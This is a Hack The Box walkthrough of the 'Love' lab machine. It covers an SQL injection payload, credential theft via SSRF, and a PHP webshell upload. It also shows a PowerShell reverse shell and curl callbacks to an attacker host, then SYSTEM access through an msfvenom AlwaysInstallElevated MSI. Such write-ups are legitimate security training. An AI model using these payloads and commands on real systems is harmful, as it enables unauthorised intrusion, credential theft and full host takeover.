Love — Hack The Box
| Info | Value |
|---|---|
| OS | Windows 10 Pro 19042 |
| Difficulty | Easy |
| IP | 10.129.48.103 |
| Hostname | love.htb, staging.love.htb |
| Services | HTTP/Apache (80,443,5000), SMB (445), MySQL/MariaDB (3306), WinRM (5985,5986), MSRPC (135) |
Enumeration
Nmap
nmap -sC -sV -p- -vvv -oA scan/nmap.scan love.htbPORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=staging.love.htb/emailAddress=roy@love.htb
| organizationName=ValentineCorp
445/tcp open microsoft-ds Windows 10 Pro 19042
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
5000/tcp open http Apache httpd 2.4.46
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (WinRM-S)
7680/tcp open pando-pub?Info from the SSL certificate (port 443)
- CN: staging.love.htb — new vhost
- Email:
roy@love.htb— first user found- Org: ValentineCorp
VHost Enumeration
See also: Subdomain Enumeration
ffuf -H "Host: FUZZ.love.htb" \
-H "User-Agent: PENTEST" \
-c \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u http://love.htb/ \
-fs 4388staging [Status: 200, Size: 5357, Words: 1543, Lines: 192]Added to /etc/hosts:
sudo tee -a /etc/hosts <<< "10.129.48.103 staging.love.htb"The SSL certificate already confirmed
staging.love.htb, but vhost fuzzing with ffuf is the correct way to discover it without relying on the certificate.
SMB signing not required:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not requiredPort 5000
Returns 403 Forbidden from outside — accessible only from localhost (relevant for SSRF).
Directory Bruteforce — love.htb
feroxbuster -u http://love.htb/ -x js,html,php,txt,json,docx -o scan/root.dirRelevant results:
| Status | Path |
|---|---|
| 200 | / (Voting System login) |
| 301 | /admin/ |
| 301 | /images/ |
| 301 | /includes/ |
| 301 | /plugins/ |
| 302 | /login.php → index.php |
| 302 | /home.php → index.php |
| 302 | /admin/login.php → index.php |
| 0 | /includes/conn.php (DB connection) |
Application
Voting System using PHP — admin panel at
/admin/, login atindex.php.
SQLi on Voting System (not necessary)
sqlmap confirmed a time-based blind SQLi on the voter parameter of the login form:
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: voter=' AND (SELECT 2697 FROM (SELECT(SLEEP(5)))NKid) AND 'vZkn'='vZkn&password=asd&login=Note
The SQLi is real but not the optimal path: time-based blind extraction is slow (one character at a time). Admin credentials are obtained much faster via SSRF.
Foothold
SSRF on staging.love.htb — Admin credentials leak
See also: 0 — Initial Recon
The vhost staging.love.htb (found in the SSL certificate) exposes a Free File Scanner with the /beta.php endpoint that accepts arbitrary URLs and displays their content (SSRF).
Step 1 — Internal port scan via SSRF
Port fuzzing of local ports using Burp Intruder:
POST /beta.php HTTP/1.1
Host: staging.love.htb
Content-Type: application/x-www-form-urlencoded
file=http://127.0.0.1:§PORT§/&read=Scan+filePort 5000 (403 from outside) returns content when accessed from localhost.
Step 2 — Access to localhost:5000
POST /beta.php HTTP/1.1
Host: staging.love.htb
Content-Type: application/x-www-form-urlencoded
file=http://127.0.0.1:5000/&read=Scan+fileThe response contains a Password Dashboard with plaintext credentials:
Vote Admin Creds admin: @LoveIsInTheAir!!!!| Username | Password | Service |
|---|---|---|
admin | @LoveIsInTheAir!!!! | Voting System (/admin/) |
Step 3 — Login to admin panel
Access to http://love.htb/admin/login.php with admin : @LoveIsInTheAir!!!! → landing on http://love.htb/admin/home.php.
RCE via File Upload — Voting System
The Voting System admin panel allows uploading a profile image in /admin/profile_update.php. There is no file type validation → PHP webshell upload.
Step 1 — Webshell upload
From the admin panel, click on the username (“Neovic Devierte”) to access the profile update. Upload a webshell as the profile picture:
<?php system($_REQUEST['cmd']);?>The file is saved in /images/pwn.php.
Step 2 — RCE confirmation
Test callback with curl:
GET /images/pwn.php?cmd=curl+<ATTACKER_IP> HTTP/1.1
Host: love.htb┌──(sverz1㉿sverz1)-[~/…/HTB/Machines/Easy/Love]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [<ATTACKER_IP>] from (UNKNOWN) [10.129.48.103] 55620
GET / HTTP/1.1
Host: <ATTACKER_IP>
User-Agent: curl/7.55.1
Accept: */*RCE confirmed.
Step 3 — Reverse shell
Base64 PowerShell reverse shell (powershell -e <B64>):
GET /images/pwn.php?cmd=powershell+-e+<BASE64_PAYLOAD> HTTP/1.1
Host: love.htb┌──(sverz1㉿sverz1)-[~/…/HTB/Machines/Easy/Love]
└─$ nc -nvlp 80
listening on [any] 80 ...
connect to [<ATTACKER_IP>] from (UNKNOWN) [10.129.48.103] 55624
whoami
love\phoebe
PS C:\xampp\htdocs\omrs\images>Shell like love\phoebe. User flag in C:\Users\phoebe\Desktop\user.txt.
Privilege Escalation
AlwaysInstallElevated → SYSTEM
Vulnerability
AlwaysInstallElevated — when both registry keys (HKLM and HKCU) are set to
1, any user can install.msipackages with NT AUTHORITY\SYSTEM privileges. It is sufficient to generate a malicious MSI with msfvenom.See also: PrivilegeEscalationWindows Ref: https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/
Step 1 — Check registry keys
PS C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1Both at 0x1 → exploitable.
Step 2 — Generate malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=443 -f msi -o evil.msiStep 3 — Transfer to target
# Attacker: HTTP server
python3 -m http.server 9999# Target: download
(New-Object Net.WebClient).DownloadFile('http://<ATTACKER_IP>:9999/evil.msi','C:\Users\Phoebe\Documents\evil.msi')Step 4 — Execute and get SYSTEM
# Attacker: listener
nc -nvlp 443# Target: install silently
msiexec /quiet /qn /i C:\Users\Phoebe\Documents\evil.msiC:\WINDOWS\system32> whoami
nt authority\systemRoot flag in C:\Users\Administrator\Desktop\root.txt.
Alternative — Privesc without reverse shell
You can use an MSI that executes a direct command (e.g., adding the user to the Administrators group) instead of a reverse shell:
msfvenom -p windows/exec CMD='net localgroup administrators phoebe /add' -f msi -o adduser.msiTransfer and execute with msiexec /quiet /qn /i adduser.msi, then logout and new login to gain admin privileges.
Logout is required
After adding the user to the Administrators group, the new privileges are not active in the current session. You must disconnect and reconnect (e.g., new evil-winrm session or new reverse shell).
Attack Chain Summary
Nmap → SSL certificate reveals roy@love.htb
│ ffuf vhost fuzzing → staging.love.htb
│
↓
staging.love.htb/beta.php → SSRF (File Scanner)
│ Internal port fuzzing via Intruder
↓
SSRF on http://127.0.0.1:5000/ → Password Dashboard
│ admin : @LoveIsInTheAir!!!!
↓
Login Voting System /admin/ → admin panel
│
↓
Upload PHP webshell via profile picture → /images/pwn.php
│ RCE confirmed with curl callback
↓
Reverse shell PowerShell base64 → love\phoebe → user flag
│
↓
AlwaysInstallElevated (HKLM + HKCU = 0x1)
│ msfvenom MSI reverse shell → msiexec /quiet /qn /i
↓
NT AUTHORITY\SYSTEM → root flag